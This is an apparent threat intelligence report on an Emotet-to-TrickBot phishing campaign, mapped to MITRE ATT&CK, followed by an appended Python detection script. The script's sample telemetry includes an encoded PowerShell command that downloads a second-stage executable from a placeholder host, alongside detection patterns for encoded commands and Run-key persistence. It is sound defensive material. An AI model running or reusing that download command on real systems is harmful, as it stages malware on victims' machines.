Alex Morgan — Threat Intelligence Analyst
Key Takeaways
- Phishing emails continue to be the primary vector for initial access, leveraging social engineering tactics.
- Emotet acts as a dropper for additional payloads, including TrickBot, focusing on credential harvesting and lateral movement.
- Effective detection requires proactive monitoring of anomalous network traffic and email filtering for known phishing signatures.
Executive Summary
During our investigation of a recent and ongoing phishing campaign, we observed the multi-stage methodology employed by threat actors using Emotet as the primary delivery mechanism for additional malicious payloads, most notably the TrickBot malware. Our analysis revealed a multi-stage attack that relies on common social engineering tactics to gain initial access and then escalates privileges within compromised environments. By dissecting the infection chain, we aim to provide actionable intelligence that can help cybersecurity teams fortify their defenses and detect these evolving threats.
Initial Access
Initial access in this campaign predominantly stemmed from phishing emails crafted with seemingly legitimate content, often posing as invoices or shipment notifications. These emails contained malicious attachments or links that redirected users to a compromised site hosting the Emotet droppers. When clicked, the embedded links led to downloads of base64-encoded files. For instance, we identified the initial payload as a Word document whose VBA macros triggered the download of the actual Emotet executable. Notably, the execution command used PowerShell to bypass common security filters by running an encoded command via powershell -encodedCommand.
Execution & Persistence
Upon successful execution, Emotet established persistence by creating registry keys so that its component would re-execute after a system reboot. Specifically, it added a subkey under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run that pointed to the executable, typically located at C:\Users\. This persistence method is effective because it avoids the more heavily scrutinized startup folders. Our detailed examination of the sample showed that Emotet gave the adversary the capability to download additional payloads, including specialized modules for lateral movement.
Command and Control
During the investigation, we tracked the command and control (C2) infrastructure used by Emotet. Traffic analysis revealed that the malware communicated over HTTP/HTTPS to a diverse set of domains, making use of domain generation algorithms (DGA) to create new C2 addresses in response to takedown efforts. This technique aligns with the adversary's tactic of maintaining resiliency by rapidly shifting C2 channels. Our analysis detected URLs patterned after common legitimate services, further obscuring the malicious activity. The C2 communication also included encrypted payloads sent after successful infection, typically containing configuration files that carry instructions for subsequent malware stages, such as downloading TrickBot.
Lateral Movement & Discovery
Once established within the environment, TrickBot utilizes various techniques to propagate through compromised networks, specifically exploiting unpatched SMB vulnerabilities and leveraging internal credentials acquired from Credential Dumping (T1003). Our findings included observable behavior indicative of Lateral Movement (T1021), where the malware executed psexec to propagate to other machines within the network. Additionally, internal reconnaissance methods deployed by TrickBot allowed actors to enumerate local user accounts and group memberships, heightening its effectiveness at stealing credentials and accessing sensitive assets.
Impact & Objectives
The primary objective of this sophisticated campaign is to facilitate extensive data exfiltration and gain persistent access to target networks. We observed that affected organizations were often targeted for financial fraud, while sensitive data was siphoned for potential ransom demands or sale on dark web forums. The dual-use nature of TrickBot, serving both as a banking Trojan and as a tool for deploying secondary payloads such as ransomware, underscores the versatility and threat level posed by this actor. During our investigation, multiple sources confirmed instances of data exfiltration, reinforcing the necessity for vigilance against such multi-faceted threats.
MITRE ATT&CK Mapping
- T1566 – Phishing: The campaign's initial entry via phishing emails.
- T1071 – Application Layer Protocol: C2 communication over HTTP/HTTPS.
- T1003 – Credential Dumping: Credential harvesting techniques employed by TrickBot in support of lateral movement.
Detection Opportunities
- Implement advanced email filtering to flag suspicious attachments and links, particularly for Office document macros.
- Monitor for unusual registry modifications tied to startup persistence behaviors, especially under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.
- Analyze outbound traffic patterns for known malicious IPs and domains associated with Emotet and TrickBot C2 communications.
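As an added illustration that is not part of the original report, the following Python sketch shows how process-creation and registry telemetry could be triaged for two of the behaviors described above: PowerShell launched from an Office application with an -EncodedCommand argument (decoded from its base64/UTF-16LE form), and a Run-key entry pointing at a user-writable path. The sample events, paths and SID are constructed placeholders, and the field names are assumed rather than taken from any specific log product.

```python
import base64
import re
# Constructed Sysmon-like sample telemetry; placeholder paths and SIDs, not real campaign data.
_ENCODED = base64.b64encode(
    r"Invoke-WebRequest -Uri http://example.invalid/stage2 -OutFile $env:TEMP\stage2.exe".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"event": "process_create", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell -NoP -W Hidden -EncodedCommand {_ENCODED}"},
    {"event": "registry_set", "key": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": r"C:\Users\jdoe\AppData\Local\Temp\svc.exe"},
    {"event": "registry_set", "key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "value": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe"},
    {"event": "process_create", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]
# powershell.exe accepts -e, -ec, -enc and -EncodedCommand (case-insensitive); the argument
# is base64 of a UTF-16LE string, so a plain base64 decode alone would not recover the script.
_ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
_RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
_OFFICE = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")

def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if absent or undecodable."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def check_process(ev):
    """Process-creation rules: PowerShell spawned by Office, and encoded command lines."""
    findings = []
    if not ev["image"].lower().endswith("powershell.exe"):
        return findings
    if ev["parent"].lower().endswith(_OFFICE):
        findings.append("office-app-spawned-powershell")
    if decode_encoded_command(ev["cmdline"]) is not None:
        findings.append("encoded-powershell-command")
    return findings

def check_registry(ev):
    """Flag Run-key entries whose target executable lives in a user-writable location."""
    target = ev["value"].lower()
    if _RUN_KEY.search(ev["key"]) and (target.startswith("c:\\users\\") or "\\temp\\" in target):
        return ["run-key-persistence-user-writable-path"]
    return []
```

The benign OneDrive Run entry and the scripted PowerShell backup job in the sample produce no findings, which is the false-positive check a rule like this needs before it goes into a SIEM.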
Analyst Notes
As we continue to monitor this ongoing threat landscape, it is imperative that organizations sharpen their focus on proactive defense mechanisms. The complex interplay between initial access vectors and persistent threats like Emotet and TrickBot demands sustained vigilance. By understanding the attack methods, organizations can better fortify their defenses against future breaches and reduce the risk of operational disruptions.
Source: Original Report